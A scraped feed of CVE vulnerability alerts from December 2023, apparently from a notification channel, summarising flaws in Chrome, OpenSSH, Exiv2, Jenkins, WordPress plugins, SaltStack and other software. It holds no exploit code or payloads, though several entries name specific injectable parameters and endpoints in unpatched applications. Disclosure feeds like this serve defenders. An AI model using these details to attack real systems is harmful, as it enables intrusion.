🚨 CVE-2023-4068Type Confusion in V8 in Google Chrome prior to 115.0.5790.170 allowed a remote attacker to perform arbitrary read/write via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-12-22 13:24:33 |
🚨 CVE-2023-28531ssh-add in OpenSSH before 9.3 adds smartcard keys to ssh-agent without the intended per-hop destination constraints. The earliest affected version is 8.9.🎖@cveNotify |
|
| 2023-12-22 13:24:32 |
🚨 CVE-2019-8343In Netwide Assembler (NASM) 2.14.02, there is a use-after-free in paste_tokens in asm/preproc.c.🎖@cveNotify |
|
| 2023-12-22 12:24:33 |
🚨 CVE-2023-51385In ssh in OpenSSH before 9.6, OS command injection might occur if a user name or host name has shell metacharacters, and this name is referenced by an expansion token in certain situations. For example, an untrusted Git repository can have a submodule with shell metacharacters in a user name or host name.🎖@cveNotify |
|
| 2023-12-22 12:24:32 |
🚨 CVE-2023-51384In ssh-agent in OpenSSH before 9.6, certain destination constraints can be incompletely applied. When destination constraints are specified during addition of PKCS#11-hosted private keys, these constraints are only applied to the first key, even if a PKCS#11 token returns multiple keys.🎖@cveNotify |
|
| 2023-12-22 10:24:52 |
🚨 CVE-2021-37615Exiv2 is a command-line utility and C++ library for reading, writing, deleting, and modifying the metadata of image files. A null pointer dereference was found in Exiv2 versions v0.27.4 and earlier. The null pointer dereference is triggered when Exiv2 is used to print the metadata of a crafted image file. An attacker could potentially exploit the vulnerability to cause a denial of service, if they can trick the victim into running Exiv2 on a crafted image file. Note that this bug is only triggered when printing the interpreted (translated) data, which is a less frequently used Exiv2 operation that requires an extra command line option (`-p t` or `-P t`). The bug is fixed in version v0.27.5.🎖@cveNotify |
|
| 2023-12-22 10:24:51 |
🚨 CVE-2021-37622Exiv2 is a command-line utility and C++ library for reading, writing, deleting, and modifying the metadata of image files. An infinite loop was found in Exiv2 versions v0.27.4 and earlier. The infinite loop is triggered when Exiv2 is used to modify the metadata of a crafted image file. An attacker could potentially exploit the vulnerability to cause a denial of service, if they can trick the victim into running Exiv2 on a crafted image file. Note that this bug is only triggered when deleting the IPTC data, which is a less frequently used Exiv2 operation that requires an extra command line option (`-d I rm`). The bug is fixed in version v0.27.5.🎖@cveNotify |
|
| 2023-12-22 10:24:50 |
🚨 CVE-2021-37620Exiv2 is a command-line utility and C++ library for reading, writing, deleting, and modifying the metadata of image files. An out-of-bounds read was found in Exiv2 versions v0.27.4 and earlier. The out-of-bounds read is triggered when Exiv2 is used to read the metadata of a crafted image file. An attacker could potentially exploit the vulnerability to cause a denial of service, if they can trick the victim into running Exiv2 on a crafted image file. The bug is fixed in version v0.27.5.🎖@cveNotify |
|
| 2023-12-22 10:24:46 |
🚨 CVE-2021-37619Exiv2 is a command-line utility and C++ library for reading, writing, deleting, and modifying the metadata of image files. An out-of-bounds read was found in Exiv2 versions v0.27.4 and earlier. The out-of-bounds read is triggered when Exiv2 is used to write metadata into a crafted image file. An attacker could potentially exploit the vulnerability to cause a denial of service by crashing Exiv2, if they can trick the victim into running Exiv2 on a crafted image file. Note that this bug is only triggered when writing the metadata, which is a less frequently used Exiv2 operation than reading the metadata. For example, to trigger the bug in the Exiv2 command-line application, you need to add an extra command-line argument such as insert. The bug is fixed in version v0.27.5.🎖@cveNotify |
|
| 2023-12-22 10:24:45 |
🚨 CVE-2021-37616Exiv2 is a command-line utility and C++ library for reading, writing, deleting, and modifying the metadata of image files. A null pointer dereference was found in Exiv2 versions v0.27.4 and earlier. The null pointer dereference is triggered when Exiv2 is used to print the metadata of a crafted image file. An attacker could potentially exploit the vulnerability to cause a denial of service, if they can trick the victim into running Exiv2 on a crafted image file. Note that this bug is only triggered when printing the interpreted (translated) data, which is a less frequently used Exiv2 operation that requires an extra command line option (`-p t` or `-P t`). The bug is fixed in version v0.27.5.🎖@cveNotify |
|
| 2023-12-22 10:24:44 |
🚨 CVE-2021-34334Exiv2 is a command-line utility and C++ library for reading, writing, deleting, and modifying the metadata of image files. An infinite loop is triggered when Exiv2 is used to read the metadata of a crafted image file. An attacker could potentially exploit the vulnerability to cause a denial of service, if they can trick the victim into running Exiv2 on a crafted image file. The bug is fixed in version v0.27.5.🎖@cveNotify |
|
| 2023-12-22 10:24:39 |
🚨 CVE-2021-31292An integer overflow in CrwMap::encode0x1810 of Exiv2 0.27.3 allows attackers to trigger a heap-based buffer overflow and cause a denial of service (DOS) via crafted metadata.🎖@cveNotify |
|
| 2023-12-22 10:24:38 |
🚨 CVE-2021-29464Exiv2 is a command-line utility and C++ library for reading, writing, deleting, and modifying the metadata of image files. A heap buffer overflow was found in Exiv2 versions v0.27.3 and earlier. The heap overflow is triggered when Exiv2 is used to write metadata into a crafted image file. An attacker could potentially exploit the vulnerability to gain code execution, if they can trick the victim into running Exiv2 on a crafted image file. Note that this bug is only triggered when writing the metadata, which is a less frequently used Exiv2 operation than reading the metadata. For example, to trigger the bug in the Exiv2 command-line application, you need to add an extra command-line argument such as `insert`. The bug is fixed in version v0.27.4.🎖@cveNotify |
|
| 2023-12-22 10:24:33 |
🚨 CVE-2021-29470Exiv2 is a command-line utility and C++ library for reading, writing, deleting, and modifying the metadata of image files. An out-of-bounds read was found in Exiv2 versions v0.27.3 and earlier. The out-of-bounds read is triggered when Exiv2 is used to write metadata into a crafted image file. An attacker could potentially exploit the vulnerability to cause a denial of service by crashing Exiv2, if they can trick the victim into running Exiv2 on a crafted image file. Note that this bug is only triggered when writing the metadata, which is a less frequently used Exiv2 operation than reading the metadata. For example, to trigger the bug in the Exiv2 command-line application, you need to add an extra command-line argument such as insert. The bug is fixed in version v0.27.4.🎖@cveNotify |
|
| 2023-12-22 10:24:32 |
🚨 CVE-2021-29457Exiv2 is a command-line utility and C++ library for reading, writing, deleting, and modifying the metadata of image files. A heap buffer overflow was found in Exiv2 versions v0.27.3 and earlier. The heap overflow is triggered when Exiv2 is used to write metadata into a crafted image file. An attacker could potentially exploit the vulnerability to gain code execution, if they can trick the victim into running Exiv2 on a crafted image file. Note that this bug is only triggered when _writing_ the metadata, which is a less frequently used Exiv2 operation than _reading_ the metadata. For example, to trigger the bug in the Exiv2 command-line application, you need to add an extra command-line argument such as `insert`. The bug is fixed in version v0.27.4.🎖@cveNotify |
|
| 2023-12-22 09:24:32 |
🚨 CVE-2021-4104JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. The attacker can provide TopicBindingName and TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2 when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.🎖@cveNotify |
|
| 2023-12-22 05:24:32 |
🚨 CVE-2023-7058A vulnerability was found in SourceCodester Simple Student Attendance System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality. The manipulation of the argument page leads to path traversal: '../filedir'. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248749 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-12-22 04:24:39 |
🚨 CVE-2023-24609Matrix SSL 4.x through 4.6.0 and Rambus TLS Toolkit have a length-subtraction integer overflow for Client Hello Pre-Shared Key extension parsing in the TLS 1.3 server. An attacked device calculates an SHA-2 hash over at least 65 KB (in RAM). With a large number of crafted TLS messages, the CPU becomes heavily loaded. This occurs in tls13VerifyBinder and tls13TranscriptHashUpdate.🎖@cveNotify |
|
| 2023-12-22 04:24:38 |
🚨 CVE-2023-6918A flaw was found in the libssh implements abstract layer for message digest (MD) operations implemented by different supported crypto backends. The return values from these were not properly checked, which could cause low-memory situations failures, NULL dereferences, crashes, or usage of the uninitialized memory as an input for the KDF. In this case, non-matching keys will result in decryption/integrity failures, terminating the connection.🎖@cveNotify |
|
| 2023-12-22 04:24:33 |
🚨 CVE-2023-49897An OS command injection vulnerability exists in AE1021PE firmware version 2.0.9 and earlier and AE1021 firmware version 2.0.9 and earlier. If this vulnerability is exploited, an arbitrary OS command may be executed by an attacker who can log in to the product.🎖@cveNotify |
|
| 2023-12-22 04:24:32 |
🚨 CVE-2023-40660A flaw was found in OpenSC packages that allow a potential PIN bypass. When a token/card is authenticated by one process, it can perform cryptographic operations in other processes when an empty zero-length pin is passed. This issue poses a security risk, particularly for OS logon/screen unlock and for small, permanently connected tokens to computers. Additionally, the token can internally track login status. This flaw allows an attacker to gain unauthorized access, carry out malicious actions, or compromise the system without the user's awareness.🎖@cveNotify |
|
| 2023-12-22 03:24:32 |
🚨 CVE-2023-51713make_ftp_cmd in main.c in ProFTPD before 1.3.8a has a one-byte out-of-bounds read, and daemon crash, because of mishandling of quote/backslash semantics.🎖@cveNotify |
|
| 2023-12-22 02:24:38 |
🚨 CVE-2023-7053A vulnerability was found in PHPGurukul Online Notes Sharing System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /user/signup.php. The manipulation leads to weak password requirements. The attack can be initiated remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248740.🎖@cveNotify |
|
| 2023-12-22 02:24:37 |
🚨 CVE-2023-51708Bentley eB System Management Console applications within Assetwise Integrity Information Server allow an unauthenticated user to view configuration options via a crafted request, leading to information disclosure. This affects eB System management Console before 23.00.02.03 and Assetwise ALIM For Transportation before 23.00.01.25.🎖@cveNotify |
|
| 2023-12-22 02:24:33 |
🚨 CVE-2023-51704An issue was discovered in MediaWiki before 1.35.14, 1.36.x through 1.39.x before 1.39.6, and 1.40.x before 1.40.2. In includes/logging/RightsLogFormatter.php, group-*-member messages can result in XSS on Special:log/rights.🎖@cveNotify |
|
| 2023-12-22 02:24:32 |
🚨 CVE-2023-49897An OS command injection vulnerability exists in AE1021PE firmware version 2.0.9 and earlier and AE1021 firmware version 2.0.9 and earlier. If this vulnerability is exploited, an arbitrary OS command may be executed by an attacker who can log in to the product.🎖@cveNotify |
|
| 2023-12-22 01:24:45 |
🚨 CVE-2023-21228In PMRChangeSparseMemOSMem of physmem_osmem_linux.c, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege in the kernel with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-12-22 01:24:39 |
🚨 CVE-2023-21227In HTBLogKM of htbserver.c, there is a possible information disclosure due to log information disclosure. This could lead to local information disclosure in the kernel with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-12-22 01:24:38 |
🚨 CVE-2023-21215In DevmemIntAcquireRemoteCtx of devicemem_server.c, there is a possible arbitrary code execution due to a race condition. This could lead to local escalation of privilege in the kernel with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-12-22 01:24:33 |
🚨 CVE-2023-21163In PMR_ReadBytes of pmr.c, there is a possible arbitrary code execution due to a use after free. This could lead to local escalation of privilege in the kernel with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-12-22 01:24:32 |
🚨 CVE-2023-21394In registerPhoneAccount of TelecomServiceImpl.java, there is a possible way to reveal images from another user due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-12-22 00:24:38 |
🚨 CVE-2023-49688Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'txtUser' parameter of the login.php resource does not validate the characters received and they are sent unfiltered to the database.🎖@cveNotify |
|
| 2023-12-22 00:24:37 |
🚨 CVE-2023-49687Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'txtPass' parameter of the login.php resource does not validate the characters received and they are sent unfiltered to the database.🎖@cveNotify |
|
| 2023-12-22 00:24:33 |
🚨 CVE-2023-49686Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'txtTotal' parameter of the Employer/InsertWalkin.php resource does not validate the characters received and they are sent unfiltered to the database.🎖@cveNotify |
|
| 2023-12-22 00:24:32 |
🚨 CVE-2023-48308Nextcloud/Cloud is a calendar app for Nextcloud. An attacker can gain access to stacktrace and internal paths of the server when generating an exception while editing a calendar appointment. It is recommended that the Nextcloud Calendar app is upgraded to 4.5.3🎖@cveNotify |
|
| 2023-12-21 23:24:45 |
🚨 CVE-2023-7024Heap buffer overflow in WebRTC in Google Chrome prior to 120.0.6099.129 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-12-21 23:24:38 |
🚨 CVE-2023-49680Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'txtTotal' parameter of the Employer/InsertJob.php resource does not validate the characters received and they are sent unfiltered to the database.🎖@cveNotify |
|
| 2023-12-21 23:24:37 |
🚨 CVE-2023-49679Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'txtTitle' parameter of the Employer/InsertJob.php resource does not validate the characters received and they are sent unfiltered to the database.🎖@cveNotify |
|
| 2023-12-21 23:24:33 |
🚨 CVE-2023-49677Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'cmbQual' parameter of the Employer/InsertJob.php resource does not validate the characters received and they are sent unfiltered to the database.🎖@cveNotify |
|
| 2023-12-21 23:24:32 |
🚨 CVE-2023-37520Unauthenticated Stored Cross-Site Scripting (XSS) vulnerability identified in BigFix Server version 9.5.12.68, allowing for potential data exfiltration. This XSS vulnerability is in the Gather Status Report, which is served by the BigFix Relay.🎖@cveNotify |
|
| 2023-12-21 22:24:40 |
🚨 CVE-2023-41993The issue was addressed with improved checks. This issue is fixed in Safari 17, iOS 16.7 and iPadOS 16.7, macOS Sonoma 14. Processing web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited against versions of iOS before iOS 16.7.🎖@cveNotify |
|
| 2023-12-21 22:24:34 |
🚨 CVE-2023-4809In pf packet processing with a 'scrub fragment reassemble' rule, a packet containing multiple IPv6 fragment headers would be reassembled, and then immediately processed. That is, a packet with multiple fragment extension headers would not be recognized as the correct ultimate payload. Instead a packet with multiple IPv6 fragment headers would unexpectedly be interpreted as a fragmented packet, rather than as whatever the real payload is.As a result, IPv6 fragments may bypass pf firewall rules written on the assumption all fragments have been reassembled and, as a result, be forwarded or processed by the host.🎖@cveNotify |
|
| 2023-12-21 22:24:33 |
🚨 CVE-2022-29045Jenkins promoted builds Plugin 873.v6149db_d64130 and earlier, except 3.10.1, does not escape the name and description of Promoted Build parameters on views displaying parameters, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.🎖@cveNotify |
|
| 2023-12-21 22:24:32 |
🚨 CVE-2022-27217Jenkins Vmware vRealize CodeStream Plugin 1.2 and earlier stores passwords unencrypted in job config.xml files on the Jenkins controller where they can be viewed by users with Extended Read permission, or access to the Jenkins controller file system.🎖@cveNotify |
|
| 2023-12-21 21:54:45 |
🚨 CVE-2023-38140Windows Kernel Information Disclosure Vulnerability🎖@cveNotify |
|
| 2023-12-21 21:54:39 |
🚨 CVE-2023-36803Windows Kernel Information Disclosure Vulnerability🎖@cveNotify |
|
| 2023-12-21 21:54:38 |
🚨 CVE-2022-30945Jenkins Pipeline: Groovy Plugin 2689.v434009a_31b_f1 and earlier allows loading any Groovy source files on the classpath of Jenkins and Jenkins plugins in sandboxed pipelines.🎖@cveNotify |
|
| 2023-12-21 21:54:37 |
🚨 CVE-2022-29044Jenkins Node and Label parameter Plugin 1.10.3 and earlier does not escape the name and description of Node and Label parameters on views displaying parameters, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.🎖@cveNotify |
|
| 2023-12-21 21:54:33 |
🚨 CVE-2022-27218Jenkins incapptic connect uploader Plugin 1.15 and earlier stores tokens unencrypted in job config.xml files on the Jenkins controller where they can be viewed by users with Extended Read permission, or access to the Jenkins controller file system.🎖@cveNotify |
|
| 2023-12-21 21:54:32 |
🚨 CVE-2022-25183Jenkins Pipeline: Shared Groovy Libraries Plugin 552.vd9cc05b8a2e1 and earlier uses the names of Pipeline libraries to create cache directories without any sanitization, allowing attackers with Item/Configure permission to execute arbitrary code in the context of the Jenkins controller JVM using specially crafted library names if a global Pipeline library configured to use caching already exists.🎖@cveNotify |
|
| 2023-12-21 21:24:45 |
🚨 CVE-2023-48687Railway Reservation System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'from' parameter of the reservation.php resource does not validate the characters received and they are sent unfiltered to the database.🎖@cveNotify |
|
| 2023-12-21 21:24:39 |
🚨 CVE-2023-48686Railway Reservation System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'user' parameter of the login.php resource does not validate the characters received and they are sent unfiltered to the database.🎖@cveNotify |
|
| 2023-12-21 21:24:38 |
🚨 CVE-2023-46648An insufficient entropy vulnerability was identified in GitHub Enterprise Server (GHES) that allowed an attacker to brute force a user invitation to the GHES Management Console. To exploit this vulnerability, an attacker would need knowledge that a user invitation was pending. This vulnerability affected all versions of GitHub Enterprise Server since 3.8 and was fixed in version 3.8.12, 3.9.7, 3.10.4, and 3.11.1. This vulnerability was reported via the GitHub Bug Bounty program.🎖@cveNotify |
|
| 2023-12-21 21:24:37 |
🚨 CVE-2023-46647Improper privilege management in all versions of GitHub Enterprise Server allows users with authorized access to the management console with an editor role to escalate their privileges by making requests to the endpoint used for bootstrapping the instance. This vulnerability affected GitHub Enterprise Server version 3.8.0 and above and was fixed in version 3.8.12, 3.9.6, 3.10.3, and 3.11.0.🎖@cveNotify |
|
| 2023-12-21 21:24:33 |
🚨 CVE-2023-46645A path traversal vulnerability was identified in GitHub Enterprise Server that allowed arbitrary file reading when building a GitHub Pages site. To exploit this vulnerability, an attacker would need permission to create and build a GitHub Pages site on the GitHub Enterprise Server instance. This vulnerability affected all versions of GitHub Enterprise Server since 3.7 and was fixed in version 3.7.19, 3.8.12, 3.9.7, 3.10.4, and 3.11.1. This vulnerability was reported via the GitHub Bug Bounty program.🎖@cveNotify |
|
| 2023-12-21 21:24:32 |
🚨 CVE-2023-6289The Swift Performance Lite WordPress plugin before 2.3.6.15 does not prevent users from exporting the plugin's settings, which may include sensitive information such as Cloudflare API tokens.🎖@cveNotify |
|
| 2023-12-21 20:54:32 |
🚨 CVE-2023-6817A use-after-free vulnerability in the Linux kernel's netfilter: nf_tables component can be exploited to achieve local privilege escalation.The function nft_pipapo_walk did not skip inactive elements during set walk which could lead double deactivations of PIPAPO (Pile Packet Policies) elements, leading to use-after-free.We recommend upgrading past commit 317eb9685095678f2c9f5a8189de698c5354316a.🎖@cveNotify |
|
| 2023-12-21 20:24:45 |
🚨 CVE-2023-50732XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. It's possible to execute a Velocity script without script right through the document tree. This has been patched in XWiki 14.10.7 and 15.2RC1.🎖@cveNotify |
|
| 2023-12-21 20:24:39 |
🚨 CVE-2023-46791Online Matrimonial Project v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'filename' attribute of the 'pic3' multipart parameter of the functions.php resource does not validate the characters received and they are sent unfiltered to the database.🎖@cveNotify |
|
| 2023-12-21 20:24:38 |
🚨 CVE-2023-6903A vulnerability classified as critical has been found in Netentsec NS-ASG Application Security Gateway 6.3.1. This affects an unknown part of the file /admin/singlelogin.php?submit=1. The manipulation of the argument loginId leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248265 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-12-21 20:24:37 |
🚨 CVE-2023-3907A privilege escalation vulnerability in GitLab EE affecting all versions from 16.0 prior to 16.4.4, 16.5 prior to 16.5.4, and 16.6 prior to 16.6.2 allows a project Maintainer to use a Project Access Token to escalate their role to Owner🎖@cveNotify |
|
| 2023-12-21 20:24:33 |
🚨 CVE-2023-30867In the Streampark platform, when users log in to the system and use certain features, some pages provide a name-based fuzzy search, such as job names, role names, etc. The sql syntax :select * from table where jobName like '%jobName%'. However, the jobName field may receive illegal parameters, leading to SQL injection. This could potentially result in information leakage.Mitigation:Users are recommended to upgrade to version 2.1.2, which fixes the issue.🎖@cveNotify |
|
| 2023-12-21 20:24:32 |
🚨 CVE-2022-23096An issue was discovered in the DNS proxy in Connman through 1.40. The TCP server reply implementation lacks a check for the presence of sufficient Header Data, leading to an out-of-bounds read.🎖@cveNotify |
|
| 2023-12-21 19:54:45 |
🚨 CVE-2023-6065The Quttera Web Malware Scanner WordPress plugin before 3.4.2.1 doesn't restrict access to detailed scan logs, which allows a malicious actor to discover local paths and portions of the site's code🎖@cveNotify |
|
| 2023-12-21 19:54:39 |
🚨 CVE-2023-5886The Export any WordPress data to XML/CSV WordPress plugin before 1.4.0, WP All Export Pro WordPress plugin before 1.8.6 does not check nonce tokens early enough in the request lifecycle, allowing attackers with the ability to upload files to make logged in users perform unwanted actions leading to PHAR deserialization, which may lead to remote code execution.🎖@cveNotify |
|
| 2023-12-21 19:54:38 |
🚨 CVE-2023-6894A vulnerability was found in Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK). It has been classified as problematic. This affects an unknown part of the file access/html/system.html of the component Log File Handler. The manipulation leads to information disclosure. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.0 is able to address this issue. It is recommended to upgrade the affected component. The identifier VDB-248253 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-12-21 19:54:33 |
🚨 CVE-2023-33220During the retrofit validation process, the firmware doesn't properly check the boundaries while copying some attributes to check. This allows a stack-based buffer overflow that could lead to a potential Remote Code Execution on the targeted device🎖@cveNotify |
|
| 2023-12-21 19:54:32 |
🚨 CVE-2023-6553The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.3.7 via the /includes/backup-heart.php file. This is due to an attacker being able to control the values passed to an include, and subsequently leverage that to achieve remote code execution. This makes it possible for unauthenticated attackers to easily execute code on the server.🎖@cveNotify |
|
| 2023-12-21 19:24:40 |
🚨 CVE-2023-47806Cross-Site Request Forgery (CSRF) vulnerability in Saint Systems Disable User Login.This issue affects Disable User Login: from n/a through 1.3.7.🎖@cveNotify |
|
| 2023-12-21 19:24:33 |
🚨 CVE-2022-40312Server-Side Request Forgery (SSRF) vulnerability in GiveWP GiveWP – Donation Plugin and Fundraising Platform.This issue affects GiveWP – Donation Plugin and Fundraising Platform: from n/a through 2.25.1.🎖@cveNotify |
|
| 2023-12-21 19:24:32 |
🚨 CVE-2023-6839Due to improper error handling, a REST API resource could expose a server side error containing an internal WSO2 specific package name in the HTTP response.🎖@cveNotify |
|
| 2023-12-21 18:54:40 |
🚨 CVE-2021-21996An issue was discovered in SaltStack Salt before 3003.3. A user who has control of the source, and source_hash URLs can gain full file system access as root on a salt minion.🎖@cveNotify |
|
| 2023-12-21 18:54:33 |
🚨 CVE-2021-3148An issue was discovered in SaltStack Salt before 3002.5. Sending crafted web requests to the Salt API can result in salt.utils.thin.gen_thin() command injection because of different handling of single versus double quotes. This is related to salt/utils/thin.py.🎖@cveNotify |
|
| 2023-12-21 18:54:32 |
🚨 CVE-2020-28243An issue was discovered in SaltStack Salt before 3002.5. The minion's restartcheck is vulnerable to command injection via a crafted process name. This allows for a local privilege escalation by any user able to create a files on the minion in a non-blacklisted directory.🎖@cveNotify |
|
| 2023-12-21 18:24:51 |
🚨 CVE-2023-22674Missing Authorization, Cross-Site Request Forgery (CSRF) vulnerability in Hal Gatewood Dashicons + Custom Post Types.This issue affects Dashicons + Custom Post Types: from n/a through 1.0.2.🎖@cveNotify |
|
| 2023-12-21 18:24:44 |
🚨 CVE-2023-49162Exposure of Sensitive Information to an Unauthorized Actor vulnerability in BigCommerce BigCommerce For WordPress.This issue affects BigCommerce For WordPress: from n/a through 5.0.6.🎖@cveNotify |
|
| 2023-12-21 18:24:43 |
🚨 CVE-2023-2487Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Smackcoders Export All Posts, Products, Orders, Refunds & Users.This issue affects Export All Posts, Products, Orders, Refunds & Users: from n/a through 2.4.1.🎖@cveNotify |
|
| 2023-12-21 18:24:39 |
🚨 CVE-2021-25284An issue was discovered in through SaltStack Salt before 3002.5. salt.modules.cmdmod can log credentials to the info or error log level.🎖@cveNotify |
|
| 2023-12-21 18:24:38 |
🚨 CVE-2021-25282An issue was discovered in through SaltStack Salt before 3002.5. The salt.wheel.pillar_roots.write method is vulnerable to directory traversal.🎖@cveNotify |
|
| 2023-12-21 18:24:33 |
🚨 CVE-2020-28972In SaltStack Salt before 3002.5, authentication to VMware vcenter, vsphere, and esxi servers (in the vmware.py files) does not always validate the SSL/TLS certificate.🎖@cveNotify |
|
| 2023-12-21 18:24:32 |
🚨 CVE-2015-1197cpio 2.11, when using the --no-absolute-filenames option, allows local users to write to arbitrary files via a symlink attack on a file in an archive.🎖@cveNotify |
|
| 2023-12-21 17:54:40 |
🚨 CVE-2023-49823Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in BoldThemes Bold Page Builder allows Stored XSS.This issue affects Bold Page Builder: from n/a through 4.6.1.🎖@cveNotify |
|
| 2023-12-21 17:54:33 |
🚨 CVE-2023-49747Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WebFactory Ltd Guest Author allows Stored XSS.This issue affects Guest Author: from n/a through 2.3.🎖@cveNotify |
|
| 2023-12-21 17:24:45 |
🚨 CVE-2023-49191Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Supsystic GDPR Cookie Consent by Supsystic allows Stored XSS.This issue affects GDPR Cookie Consent by Supsystic: from n/a through 2.1.2.🎖@cveNotify |
|
| 2023-12-21 17:24:38 |
🚨 CVE-2023-46143Download of Code Without Integrity Check vulnerability in PHOENIX CONTACT classic line PLCs allows an unauthenticated remote attacker to modify some or all applications on a PLC.🎖@cveNotify |
|
| 2023-12-21 17:24:37 |
🚨 CVE-2023-46142A incorrect permission assignment for critical resource vulnerability in PLCnext products allows an remote attacker with low privileges to gain full access on the affected devices.🎖@cveNotify |
|
| 2023-12-21 17:24:34 |
🚨 CVE-2023-46141Incorrect Permission Assignment for Critical Resource vulnerability in multiple products of the PHOENIX CONTACT classic line allow an remote unauthenticated attacker to gain full access of the affected device.🎖@cveNotify |
|
| 2023-12-21 17:24:33 |
🚨 CVE-2023-6478A flaw was found in xorg-server. A specially crafted request to RRChangeProviderProperty or RRChangeOutputProperty can trigger an integer overflow which may lead to a disclosure of sensitive information.🎖@cveNotify |
|
| 2023-12-21 17:24:32 |
🚨 CVE-2023-6377A flaw was found in xorg-server. Querying or changing XKB button actions such as moving from a touchpad to a mouse can result in out-of-bounds memory reads and writes. This may allow local privilege escalation or possible remote code execution in cases where X11 forwarding is involved.🎖@cveNotify |
|
| 2023-12-21 16:54:32 |
🚨 CVE-2023-49189Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Getsocial, S.A. Social Share Buttons & Analytics Plugin – GetSocial.Io allows Stored XSS.This issue affects Social Share Buttons & Analytics Plugin – GetSocial.Io: from n/a through 4.3.12.🎖@cveNotify |
|
| 2023-12-21 16:24:51 |
🚨 CVE-2023-51051S-CMS v5.0 was discovered to contain a SQL injection vulnerability via the A_textauth parameter at /admin/ajax.php.🎖@cveNotify |
|
| 2023-12-21 16:24:45 |
🚨 CVE-2023-51050S-CMS v5.0 was discovered to contain a SQL injection vulnerability via the A_productauth parameter at /admin/ajax.php.🎖@cveNotify |
|
| 2023-12-21 16:24:44 |
🚨 CVE-2023-4256Within tcpreplay's tcprewrite, a double free vulnerability has been identified in the tcpedit_dlt_cleanup() function within plugins/dlt_plugins.c. This vulnerability can be exploited by supplying a specifically crafted file to the tcprewrite binary. This flaw enables a local attacker to initiate a Denial of Service (DoS) attack.🎖@cveNotify |
|
| 2023-12-21 16:24:43 |
🚨 CVE-2023-4255An out-of-bounds write issue has been discovered in the backspace handling of the checkType() function in etc.c within the W3M application. This vulnerability is triggered by supplying a specially crafted HTML file to the w3m binary. Exploitation of this flaw could lead to application crashes, resulting in a denial of service condition.🎖@cveNotify |
|
| 2023-12-21 16:24:39 |
🚨 CVE-2023-45118Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'fdid' parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database.🎖@cveNotify |
|
| 2023-12-21 16:24:38 |
🚨 CVE-2023-45115Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'ch' parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database.🎖@cveNotify |
|
| 2023-12-21 16:24:33 |
🚨 CVE-2023-48115SmarterTools SmarterMail 8495 through 8664 before 8747 allows stored DOM XSS because an XSS protection mechanism is skipped when messageHTML and messagePlainText are set in the same request.🎖@cveNotify |
|
| 2023-12-21 16:24:32 |
🚨 CVE-2023-48380Softnext Mail SQR Expert is an email management platform, it has insufficient filtering for a special character within a spcific function. A remote attacker authenticated as a localhost can exploit this vulnerability to perform command injection attacks, to execute arbitrary system command, manipulate system or disrupt service.🎖@cveNotify |
|
| 2023-12-21 15:54:33 |
🚨 CVE-2023-48382Softnext Mail SQR Expert is an email management platform, it has a Local File Inclusion (LFI) vulnerability in a mail deliver-related URL. An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary PHP file with .asp file extension under specific system paths, to access and modify partial system information but does not affect service availability.🎖@cveNotify |
|
| 2023-12-21 15:54:32 |
🚨 CVE-2023-48374SmartStar Software CWS is a web-base integration platform, it has a vulnerability of using a hard-coded for a specific account with low privilege. An unauthenticated remote attacker can exploit this vulnerability to run partial processes and obtain partial information, but can't disrupt service or obtain sensitive information.🎖@cveNotify |
